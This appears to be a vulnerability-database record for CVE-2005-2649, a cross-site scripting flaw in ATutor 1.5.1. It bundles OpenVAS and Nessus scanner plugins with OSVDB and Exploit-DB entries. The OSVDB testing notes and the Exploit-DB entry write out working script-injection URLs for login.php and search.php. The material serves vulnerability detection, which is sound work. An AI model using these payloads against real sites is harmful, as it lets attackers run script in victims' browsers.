ID OPENVAS:136141256231019587 Type openvas Reporter Copyright (C) 2005 Josh Zlatin-Amishav Modified 2020-05-08T00:00:00
Description
The remote version of ATutor (1.5.1 is known to be affected) is prone to cross-site scripting
attacks because it fails to sanitize user-supplied input, specifically the 'course' parameter of login.php and the 'words' parameter of search.php (CVE-2005-2649).
###############################################################################
# OpenVAS Vulnerability Test
#
# ATutor Cross Site Scripting Vulnerability
#
# Authors:
# Josh Zlatin-Amishav <josh at ramat doti cc>
#
# Copyright:
# Copyright (C) 2005 Josh Zlatin-Amishav
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
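CPE = "cpe:/a:atutor:atutor";

# Registration phase: the scanner runs this once with `description` set to
# collect metadata; the actual check below never executes in this mode.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.19587");
  script_version("2020-05-08T08:34:44+0000");
  script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
  script_tag(name:"creation_date", value:"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)");
  script_cve_id("CVE-2005-2649");
  script_bugtraq_id(14598);
  # OSVDB 18842 covers login.php?course, OSVDB 18843 covers search.php?words.
  script_xref(name:"OSVDB", value:"18842");
  script_xref(name:"OSVDB", value:"18843");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");

  script_name("ATutor Cross Site Scripting Vulnerability");

  # ACT_ATTACK: the check sends a harmless, randomised <script>alert()</script>
  # payload to the target, so it belongs in the attack phase, not in a
  # passive/safe-checks category.
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2005 Josh Zlatin-Amishav");

  # gb_atutor_detect.nasl sets "atutor/detected" and provides the port and
  # install path consumed via get_app_port()/get_app_location();
  # cross_site_scripting.nasl provides the generic-XSS marker queried through
  # http_get_has_generic_xss() to suppress false positives.
  script_dependencies("gb_atutor_detect.nasl", "cross_site_scripting.nasl");
  script_mandatory_keys("atutor/detected");
  script_require_ports("Services/www", 80);

  script_xref(name:"URL", value:"http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html");
  script_xref(name:"URL", value:"http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html");

  script_tag(name:"summary", value:"The remote version of ATutor is prone to cross-site scripting
attacks due to its failure to sanitize user-supplied input.");

  script_tag(name:"insight", value:"ATutor echoes the 'course' parameter of login.php and the 'words'
parameter of search.php back into the page without sanitizing them (CVE-2005-2649).");

  script_tag(name:"impact", value:"A remote attacker can craft a URL which, when followed by a victim, executes
arbitrary script code in the victim's browser within the trust relationship between the browser and the
affected site, leading to a loss of integrity.");

  script_tag(name:"affected", value:"ATutor version 1.5.1 is known to be affected.");

  # NOTE(review): OSVDB 18842/18843 state that the vendor (Adaptive Technology
  # Resource Centre) released a patch for this issue, which conflicts with the
  # "no known solution" wording and the WillNotFix classification below.
  # Left unchanged pending confirmation against the vendor's release history.
  script_tag(name:"solution", value:"No known solution was made available for at least one year since the
disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to
upgrade to a newer release, disable respective features, remove the product or replace the product by another
one.");

  # remote_analysis: the finding rests on observing the payload reflected by
  # the live application, not on a version string.
  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}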
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");
include("misc_func.inc");
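# Detection phase: only reached when gb_atutor_detect.nasl has already
# fingerprinted an ATutor install on this host.
if( ! port = get_app_port( cpe:CPE ) )
  exit( 0 );

if( ! dir = get_app_location( cpe:CPE, port:port ) )
  exit( 0 );

# Avoid building "//login.php" when the application sits at the document root.
if( dir == "/" )
  dir = "";

host = http_host_name( port:port );

# A server that reflects arbitrary input everywhere (flagged by
# cross_site_scripting.nasl) would make the reflection test below meaningless,
# so bail out early instead of reporting a false positive.
if( http_get_has_generic_xss( port:port, host:host ) )
  exit( 0 );

# Randomised marker so the reflected payload cannot be confused with static
# page content or with payloads left behind by other scanners.
vtstrings = get_vt_strings();
xss = "<script>alert(" + vtstrings["lowercase_rand"] + ")</script>";

# nb: the url-encoded version is what we need to pass in.
exss = urlencode( str:xss );

# Both injection points covered by CVE-2005-2649: the 'course' parameter of
# login.php (OSVDB 18842) and the 'words' parameter of search.php (OSVDB 18843).
# The original check only exercised login.php, so an install that had fixed
# one vector but not the other was missed.
urls = make_list(
  dir + '/login.php?course=">' + exss,
  dir + '/search.php?search=1&words=">' + exss + '&include=all&find_in=all&display_as=pages' );

foreach url( urls ) {

  req = http_get( item:url, port:port );
  res = http_keepalive_send_recv( port:port, data:req );
  if( ! res )
    continue;

  # Require all three conditions: a 200 response, the payload reflected
  # verbatim (i.e. not HTML-encoded, which would be the safe behaviour), and
  # the ATutor footer so we know the echoing page is really the application
  # and not some unrelated handler on the same vhost.
  if( res =~ "^HTTP/1\.[01] 200" && xss >< res &&
      egrep( string:res, pattern:"Web site engine's code is copyright .+ href=.http://www\.atutor\.ca" ) ) {
    report = http_report_vuln_url( port:port, url:url );
    security_message( port:port, data:report );
    exit( 0 );
  }
}

exit( 0 );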
{"id": "OPENVAS:136141256231019587", "type": "openvas", "bulletinFamily": "scanner", "title": "ATutor Cross Site Scripting Vulnerability", "description": "The remote version of ATutor is prone to cross-site scripting\n attacks due to its failure to sanitize user-supplied input.", "published": "2006-03-26T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231019587", "reporter": "Copyright (C) 2005 Josh Zlatin-Amishav", "references": ["18842", "18843", "http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html", "http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html"], "cvelist": ["CVE-2005-2649"], "lastseen": "2020-05-12T15:08:25", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-18842", "CVE-2017-18842", "CVE-2018-18843", "CVE-2018-18842", "CVE-2005-2649", "CVE-2017-18843"]}, {"type": "exploitdb", "idList": ["EDB-ID:18842", "EDB-ID:26170", "EDB-ID:18843"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_1033750FCAB411D99AED000E0C2E438A.NASL", "ATUTOR_XSS.NASL", "FREEBSD_PKG_0FF0E9A64EE011D9A9E70001020EED82.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:18842", "OSVDB:18843"]}, {"type": "xssed", "idList": ["XSSED:18842"]}, {"type": "hackerone", "idList": ["H1:18843"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18843", "SECURITYVULNS:DOC:18842"]}, {"type": "seebug", "idList": ["SSV:18843", "SSV:18842"]}, {"type": "zdt", "idList": ["1337DAY-ID-18842", "1337DAY-ID-18843"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18843"]}, {"type": "myhack58", "idList": ["MYHACK58:62200818843"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-18843"]}], "modified": "2020-05-12T15:08:25", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-05-12T15:08:25", "rev": 2}, "vulnersScore": 6.0}, "pluginID": "136141256231019587", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ATutor Cross Site Scripting Vulnerability\n#\n# Authors:\n# Josh Zlatin-Amishav <josh at ramat doti cc>\n#\n# Copyright:\n# Copyright (C) 2005 Josh Zlatin-Amishav\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atutor:atutor\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.19587\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_cve_id(\"CVE-2005-2649\");\n script_bugtraq_id(14598);\n script_xref(name:\"OSVDB\", value:\"18842\");\n script_xref(name:\"OSVDB\", value:\"18843\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_name(\"ATutor Cross Site Scripting Vulnerability\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2005 Josh Zlatin-Amishav\");\n script_dependencies(\"gb_atutor_detect.nasl\", \"cross_site_scripting.nasl\");\n script_mandatory_keys(\"atutor/detected\");\n 
script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\n disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to\n upgrade to a newer release, disable respective features, remove the product or replace the product by another\n one.\");\n\n script_tag(name:\"summary\", value:\"The remote version of ATutor is prone to cross-site scripting\n attacks due to its failure to sanitize user-supplied input.\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"url_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nvtstrings = get_vt_strings();\nxss = \"<script>alert(\" + vtstrings[\"lowercase_rand\"] + \")</script>\";\n# nb: the url-encoded version is what we need to pass in.\nexss = urlencode( str:xss );\n\nhost = http_host_name( port:port );\n\nif( http_get_has_generic_xss( port:port, host:host ) ) exit( 0 );\n\nurl = dir + '/login.php?course=\">' + exss;\n\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( res =~ \"^HTTP/1\\.[01] 200\" && xss >< res &&\n egrep( string:res, pattern:\"Web site engine's code is copyright .+ href=.http://www\\.atutor\\.ca\" ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 0 );\n", "naslFamily": "Web application 
abuses"}
{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "Cross-site scripting (XSS) vulnerability in ATutor 1.5.1 allows remote attackers to inject arbitrary web script or HTML via (1) course parameter in login.php or (2) words parameter in search.php.", "edition": 3, "cvss3": {}, "published": "2005-08-23T04:00:00", "title": "CVE-2005-2649", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2649"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:adaptive_technology_resource_centre:atutor:1.5.1"], "id": "CVE-2005-2649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2649", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:adaptive_technology_resource_centre:atutor:1.5.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:15", "bulletinFamily": "software", "cvelist": ["CVE-2005-2649"], "edition": 1, "description": "## Vulnerability Description\nATutor contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'course' variable upon submission to the 'login.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. 
However, the Adaptive Technology Resource Centre has released a patch to address this vulnerability.\n## Short Description\nATutor contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'course' variable upon submission to the 'login.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/tour/login.php?course=\"><script>alert('Matrix_Killer r0X');</script>\n## References:\nVendor URL: http://www.atutor.ca/\nSecurity Tracker: 1014731\n[Secunia Advisory ID:16496](https://secuniaresearch.flexerasoftware.com/advisories/16496/)\n[Related OSVDB ID: 18843](https://vulners.com/osvdb/OSVDB:18843)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html\nISS X-Force ID: 21910\n[CVE-2005-2649](https://vulners.com/cve/CVE-2005-2649)\nBugtraq ID: 14598\n", "modified": "2005-08-18T05:36:23", "published": "2005-08-18T05:36:23", "href": "https://vulners.com/osvdb/OSVDB:18842", "id": "OSVDB:18842", "type": "osvdb", "title": "ATutor login.php course Variable XSS", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:15", "bulletinFamily": "software", "cvelist": ["CVE-2005-2649"], "edition": 1, "description": "## Vulnerability Description\nATutor contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'words' variable upon submission to the 'search.php' script. 
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, the Adaptive Technology Resource Centre has released a patch to address this vulnerability.\n## Short Description\nATutor contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'words' variable upon submission to the 'search.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/tour/search.php?search=1&search=1&words=\"><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages\n\nhttp://[target]/tour/search.php?search=1&words=\"><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search\n## References:\nVendor URL: http://www.atutor.ca/\nSecurity Tracker: 1014731\n[Secunia Advisory ID:16496](https://secuniaresearch.flexerasoftware.com/advisories/16496/)\n[Related OSVDB ID: 18842](https://vulners.com/osvdb/OSVDB:18842)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html\nISS X-Force ID: 21910\n[CVE-2005-2649](https://vulners.com/cve/CVE-2005-2649)\nBugtraq ID: 14598\n", "modified": "2005-08-18T05:36:23", "published": "2005-08-18T05:36:23", "href": "https://vulners.com/osvdb/OSVDB:18843", "id": "OSVDB:18843", "type": "osvdb", "title": "ATutor search.php words Variable XSS", "cvss": {"score": 4.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T03:00:06", "description": "ATutor 1.5.1 login.php course Parameter XSS. CVE-2005-2649. Webapps exploit for php platform", "published": "2005-08-18T00:00:00", "type": "exploitdb", "title": "ATutor 1.5.1 login.php course Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2649"], "modified": "2005-08-18T00:00:00", "id": "EDB-ID:26170", "href": "https://www.exploit-db.com/exploits/26170/", "sourceData": "source: http://www.securityfocus.com/bid/14598/info\r\n\r\nATutor is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. \r\n\r\nhttp://www.example.com/tour/login.php?course=\"><script>alert('XSS');</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/26170/"}], "nessus": [{"lastseen": "2021-01-20T09:25:07", "description": "The remote host is running ATutor, a CMS written in PHP. 
\n\nThe remote version of this software is prone to cross-site scripting \nattacks due to its failure to sanitize user-supplied input.", "edition": 20, "published": "2005-09-06T00:00:00", "title": "ATutor 1.5.1 Multiple Script XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2649"], "modified": "2005-09-06T00:00:00", "cpe": ["cpe:/a:adaptive_technology_resource_centre:atutorv"], "id": "ATUTOR_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/19587", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Josh Zlatin-Amishav <josh at ramat doti cc>\n#\n# This script is released under the GNU GPLv2\n\n# Changes by Tenable:\n# - Revised plugin title (4/28/09)\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(19587);\n script_version(\"1.23\");\n script_cve_id(\"CVE-2005-2649\");\n script_bugtraq_id(14598);\n\n script_name(english:\"ATutor 1.5.1 Multiple Script XSS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is vulnerable to a\ncross-site scripting issue.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running ATutor, a CMS written in PHP. 
\n\nThe remote version of this software is prone to cross-site scripting \nattacks due to its failure to sanitize user-supplied input.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Aug/259\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Aug/598\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/09/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/08/18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adaptive_technology_resource_centre:atutorv\");\nscript_end_attributes();\n\n\n script_summary(english:\"Checks for XSS in login.php\");\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n script_copyright(english:\"Copyright (C) 2005-2021 Josh Zlatin-Amishav\");\n script_dependencies(\"http_version.nasl\", \"cross_site_scripting.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\nif(!get_port_state(port))exit(0);\nif(!can_host_php(port:port)) 
exit(0);\nif ( get_kb_item(\"www/\"+port+\"/generic_xss\") ) exit(0);\n\n# A simple alert.\nxss = \"<script>alert(\" + SCRIPT_NAME + \")</script>\";\n# nb: the url-encoded version is what we need to pass in.\nexss = urlencode(str:xss);\n\nforeach dir ( cgi_dirs() )\n{\n req = http_get(\n item:string(\n dir, \"/login.php?\",\n 'course=\">', exss\n ), \n port:port\n );\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n\ndebug_print(\"res [\", res, \"].\");\n\n if (\n egrep(string:res, pattern:\"Web site engine's code is copyright .+ href=.http://www\\.atutor\\.ca\") &&\n xss >< res\n )\n {\n \tsecurity_warning(port);\n\t\tset_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n \texit(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}